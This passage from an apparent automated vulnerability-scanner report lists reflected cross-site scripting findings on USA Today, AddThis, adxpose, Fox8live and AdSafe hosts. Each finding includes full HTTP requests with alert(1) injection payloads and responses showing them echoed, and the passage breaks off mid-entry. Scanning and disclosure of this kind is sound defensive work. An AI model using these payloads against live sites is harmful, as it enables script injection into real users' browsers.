...[SNIP]...

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b62f(a)0ff55e3ea5c was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=5b62f(a)0ff55e3ea5c HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 9474
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "5b62f(a)0ff55e3ea5c","ref": "","title": "5b62f(a)0ff55e3ea5c","section": "5b62f(a)0ff55e3ea5c","nav": "<ul id=\"section-nav\"><li class=\"sectionlabel\">News:</li><li class=\"nav
...[SNIP]...
tData(String retrieverType, String tags, Int32 count, Dictionary`2 dataparms)
at FeedDataService.DataService.GetData()
at SuperFeeds.feed.ProcessRequest(HttpContext context) /feed/most/popular-5b62f(a)0ff55e3ea5c/json/5</div>
...[SNIP]...

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d135b"%3balert(1)//12ce116bf28 was submitted in the url parameter. This input was echoed as d135b";alert(1)//12ce116bf28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b"%3balert(1)//12ce116bf28 HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12749
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b";alert(1)//12ce116bf28","ref": "","title": "12ce116bf28","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 734a0%3balert(1)//0e9845649fa was submitted in the var parameter. This input was echoed as 734a0;alert(1)//0e9845649fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks734a0%3balert(1)//0e9845649fa&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12743
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks734a0;alert(1)//0e9845649fa = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm","ref": "","title": "Floods","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 18cfc<script>alert(1)</script>6e94a043035 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:39 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955519.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close

_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.73. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 388c8<script>alert(1)</script>6f81c5c2df was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B586A135B60950B5DCB0D4C24B6EBC5; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Mon, 09 May 2011 15:35:29 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df");

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e0df'-alert(1)-'3ecdc21eb2c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot21e0df'-alert(1)-'3ecdc21eb2c&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:03 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:03 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 794


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot21e0df'-alert(1)-'3ecdc21eb2c%26Output%3DJS&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scri
...[SNIP]...

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e61'-alert(1)-'1eee3fb9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue98e61'-alert(1)-'1eee3fb9769?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:05 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:05 GMT
Expires: Mon, 09 May 2011 15:38:05 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 41367

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
)[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue98e61'-alert(1)-'1eee3fb9769%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS&Type=widget&Client=inergize.wvue98e61'-alert(1)-'1eee3fb9769&rand=' + Math.random();
head.appendChild(script);

_
...[SNIP]...

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50502'-alert(1)-'40811c352d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot2&Output=JS&50502'-alert(1)-'40811c352d1=1 HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:04 GMT
Expires: Mon, 09 May 2011 15:38:04 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40716

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS%2650502'-alert(1)-'40811c352d1%3D1&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=documen
...[SNIP]...

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the PluID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa553"-alert(1)-"6db1ea67994 was submitted in the PluID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F353BA1915795343A0F9402D71BD02A2; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   re
...[SNIP]...

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec2b"-alert(1)-"73b143e8b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=75C77546E2FDBC3BDA7E9D1F94CBDA6B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/25
...[SNIP]...

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93f2"-alert(1)-"d26d1447152 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=263751F3FB1658F4A13DD4C934811422; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4
...[SNIP]...

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41d4b"-alert(1)-"2bc1aa27d11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDE6C67ED5D1DA3D339CCD1B475C599B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4158923
...[SNIP]...

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd0f"-alert(1)-"91890140fec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A826F056C48F6FF462E93381B905229; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%
...[SNIP]...

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

